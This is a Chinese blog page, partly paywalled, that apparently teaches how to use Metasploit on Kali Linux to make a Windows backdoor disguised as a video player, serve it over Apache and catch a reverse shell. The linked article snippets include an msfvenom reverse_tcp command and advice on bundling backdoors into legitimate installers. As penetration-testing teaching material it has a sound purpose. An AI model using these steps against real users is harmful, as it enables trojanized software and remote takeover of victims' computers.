kali中使用msf制作Windows恶意软件获取shell

最新推荐文章于 2024-12-18 18:02:24 发布
原创 最新推荐文章于 2024-12-18 18:02:24 发布
· 1.2k 阅读 · 3 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #安全 #shell #docker

本文介绍了如何在kali Linux环境下使用Metasploit(msf)框架生成Windows恶意软件,通过制作后门程序如西瓜影音.exe,结合Apache服务器提供下载链接,最终在MSF上监听并获取shell,模拟黑客行为进行渗透测试。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.1制作Windows恶意软件获取shell

后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为

思路就是利用社会工程学中人的心理,去为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell

1.1.1生成西瓜影音.exe后门程序
在这里插入图片描述
1.1.2在MSF上启动handler开始监听后门程序
在这里插入图片描述
1.1.3在Kali上启动apache为后门程序提供下载地址
在这里插入图片描述
1.1.4在MSF终端查看建立的session
在这里插入图片描述
1.2模拟黑客给真正的快播软件加上后门
在这里插入图片描述在这里插入图片描述
用户启动以后即可连接成功在这里插入图片描述

最低0.47元/天 解锁文章
使用msfvenom获取windows shell
赴前尘
06-26 823
使用msfvenom获取windows shell
利用Msfvenom获取WindowsShell
DoubleJing的博客
07-18 513
一、在kali主机上利用msfvenom生成windows端的安装程序(exe文件),程序名最好取一个大家经常安装的程序,如腾讯视频、爱奇艺等。(1)由于生成的程序可能会被杀毒软件识别,我们比较一下使用单个编码器生成的程序与用两个编码器生成的程序,哪个更容易被识别。此时我们已经获取到主机地址为192.168.137.133shell,我们可以利用dos命令进行相应的操作。二、将生成的两个exe文件下载到物理机,使用ssh客户端连接kali主机,利用sz工具下载两个exe文件。六、查看是否建立连接。
MSF制作Windows客户端恶意软件获取SHELL过程
永远是少年
06-10 1206
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF制作Windows客户端恶意软件获取SHELL。 一、后门程序生成 二、MSF监听 三、效果检验 (一)MSF监听结果 (二)恶意软件扫描
msfconsole之制作windows木马成功获取shell(正向payload)
2201_75387456的博客
05-27 1290
还有⽐如 有⼀种情 况,⽬标处于深层⽹络,不能直接连通外⽹,也不能通过其他机器连通,因 为其他机器 防⽕墙都开着,为避免在有防⽕墙监控的情况下关闭防⽕墙⽽被发现,也只能⽤正向的⻢,然后通过开着防⽕墙的机器来进⾏端⼝的转发达到穿透的⽬的。set payload windows/x64/meterpreter/bind_tcp //生成exe时相同的协议。端⼝启⽤监听后,只会接收⼀次数据,⽆论成功或者失败,它 都不会再监听了!将生成的文件在靶机中打开,利用netstat -ano查看打开的端口。
msfconsole之制作windows木马成功获取shell(反向payload)
2201_75387456的博客
05-27 890
相关命令:msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.5.129 LPORT=7680 -f exe > win012.exe。set PAYLOAD windows/meterpreter/reverse_tcp //和上面msfvenom使用 的payload相同。set lhost 192.168.5.129 //kali的ip。需要注意这里的lhost填写的是kali的ip。3.进入msfconsole设置。
使用kali下的msfwindows 2003进行测试
Amdy_amdy的博客
07-02 2726
使用kali下的msfwindows 2003进行测试 测试环境: windows 2003 192.168.145.132 kali: 192.168.145.146 使用kali查看windows2003下开放的端口以及对应端口是否存在漏洞: nmap --script=vuln 192.168.145.132 root@kali:~# nmap --script=vuln ...
MSFWindows渗透测试
qq_67812668的博客
08-09 1210
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
MSF基于JAVA的漏洞获取shell实战
永远是少年
06-13 825
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF基于JAVA的漏洞获取shell实战。 一、环境准备 二、MSF设置 三、效果检验
msfconsole 控制台使用和操作
推理小孩的博客
01-02 2617
msfconsole 控制台使用和操作   msfconsole 参数   Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里...
如何使用kali来入侵(渗透)一台windows
热门推荐
qq_46406833的博客
05-17 2万+
此文章为网络安全爱好者小白设计的,所以木马没做免杀,渗透前请把防火墙和杀毒软件关闭
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windowslinux 客户端恶意软件进行渗透
天下著书立传者,皆为我师
05-29 2661
通过制作含病毒和木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
渗透测试-模拟黑客给软件加上后门获取shell
保持微笑的博客
01-17 1808
1.下载一个正常的软件 我们这里以迅雷为例 安装迅雷,打开软件,启动任务管理器,查看进程。 如图所示,在迅雷启动的同时,会自动启动一个迅雷下载引擎DodnloadSDKServer.exe *32软件,这时我们就可以在这个软件里面直入后门,也就是给子程序捆绑后门。 注:不要对主软件进行后门植入,以免造成软件不能正常使用。 2.将迅雷的子程序上传到kali系统的根目录下 3.对子程序注入payload后门程序 命令: msfvenom -a x86 --platform window
Kali系统安装与初始化-双系统Windows/Kali(含问题与解决办法)
weixin_42416368的博客
12-18 2372
kali系统安装/双系统安装/Kali系统问题处理/主力系统/debian
windows下安装linuxkali子系统
h1825819493的博客
05-27 2175
如果运行的是 Windows 10 版本1903 或 1909,请在 Windows 菜单中打开“设置”,导航到“更新和安全性”,然后选择“检查更新”。若要打开窗格,可使用 Alt+Shift++ 打开垂直窗格,或使用 Alt+Shift+- 打开水平窗格。若要检查 Windows 版本及内部版本号,选择 Windows 徽标键 + R,然后键入“winver”,选择“确定”。WSL 2 具有 WSL 1 的优点,但使用实际的 Linux 内核,而不是使用 WSL 1 之类的转换层,从而提高性能。
kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
01-27 1万+
本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵监控屏幕。
kaliwindows安装kali虚拟机教程 kali虚拟机桥接模式
孟秋与你的博客
01-20 6789
本文重点介绍虚拟机的安装 : (如果是win10 还可以下载子系统 教程可以参考我的docker详细步骤那篇博客 里面提及Ubuntu的子系统下载,而win7是不支持子系统的) 下载vmware vmware同样对windows版本有着要求 最新版本的vmware16 只支持win8及以上的 由于我本机是win7 于是下载了wmware15 进入官网 点击资源 再点击产品下载 如下图(期间需要注册 密码需要特殊字符 需要邮箱激活 ) ctrl + F 利用浏览器自带的搜索功能 找到Vmware w
kaliWindows10双系统
hhiollk的博客
04-23 4614
物理机上的kali系统 本来要搭建网盘的,因为我申请芝加哥教育网邮箱那天是圣诞节一直没有通过,然后没事做我就装了个双系统玩玩。镜像就选择最新的kali镜像,点击下载即可。 安装须知 安装之前用DiskGenius看一下电脑的硬盘是不是GUID格式,不是的话下载DiskGenius进行重新分区,分区必须创建ESP分区跟MSR分区,这个是windows系统跟...
MSF恶意程序利用【实战】
10-01 188
后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为 。 思路:利用社会工程学中人的心理,为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell
kalilinux使用msf生成elf木马
最新发布
12-30
Kali Linux 中,`msfvenom` 是 Metasploit 框架的一部分,专门用于创建各种类型的恶意载荷。为了生成一个 ELF 格式的木马文件,可以按照如下方法操作: #### 准备工作 确保已经安装配置好最新的 Metasploit ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值